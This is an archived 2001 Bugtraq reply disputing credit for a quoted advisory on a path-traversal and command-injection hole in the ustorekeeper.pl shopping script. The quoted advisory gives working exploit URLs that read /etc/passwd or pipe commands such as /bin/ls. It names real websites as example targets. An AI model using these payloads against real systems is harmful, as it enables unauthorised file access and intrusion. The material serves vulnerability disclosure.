[20034] in bugtraq
Re: new advisory
daemon@ATHENA.MIT.EDU (admin@cgisecurity.com)
Thu Apr 5 20:00:37 2001
Content-Type: text
Message-ID: <200104041735.NAA08537@iridium.mv.net>
Date: Wed, 4 Apr 2001 13:35:06 -0400
Reply-To: "admin@cgisecurity.com" <admin@CGISECURITY.COM>
From: "admin@cgisecurity.com" <admin@CGISECURITY.COM>
X-To: ukrteam@ukr.net
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200104030408.HAA79114@fatlady.ukr.net> from "UkR hacking team"
at Apr 3, 2001 07:08:47 am
> ---=== UkR security team - Advisory ===---
> uStorekeeper(tm) Online Shopping System - Runtime Script
> - 'arbitrary file retreival' vulnerability
> Date: 03.04.2001
> Problem: input validation error.
> Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested)
> Product vendor: Microburst Technologies / http://www.uburst.com
> Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd).
The following advisory was actually found in december of 2000 by the staff
at cgisecurity.com. No bugtraq posted was published on the otherhand because
after speaking with the vendor they informed us that not every version
was effected and they the newer versions of this product have been patched.
A staff member of cgisecurity.com did make a proof of exploit for this code
but we did give little details of the vendor due to them asking us not
to.
Every so often when finding a new bug it will get posted publically before
you can even finish looking into its full details. This has been the case for
about 5 advisories and we have scraped them due to this. It is noted that UkR
probably had no idea that this was a published known problem and that
researching a exploit before releasing it is usually a good idea.
(Try going to google and searching for it. You will find our semi
advisory release pops up in this search) WE decided not to publish our
exploit onto bugtraq because we are not about lives of kiddots easier
but if you would like to check it out following the link from our main site.
> Workaround:
> Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh)
> Greets
> Exploit:
> http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
> http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
> Example:
> http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
> http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|
Now is mentioning the victem websites really needed?
Finding a hole is one thing but providing a url to click onto
to exploit it is just stupid. Hopefully non of these admins
find out and decide to sue you .
(Everybody else keep checking attrition and see if this is the case)
- zenomorph
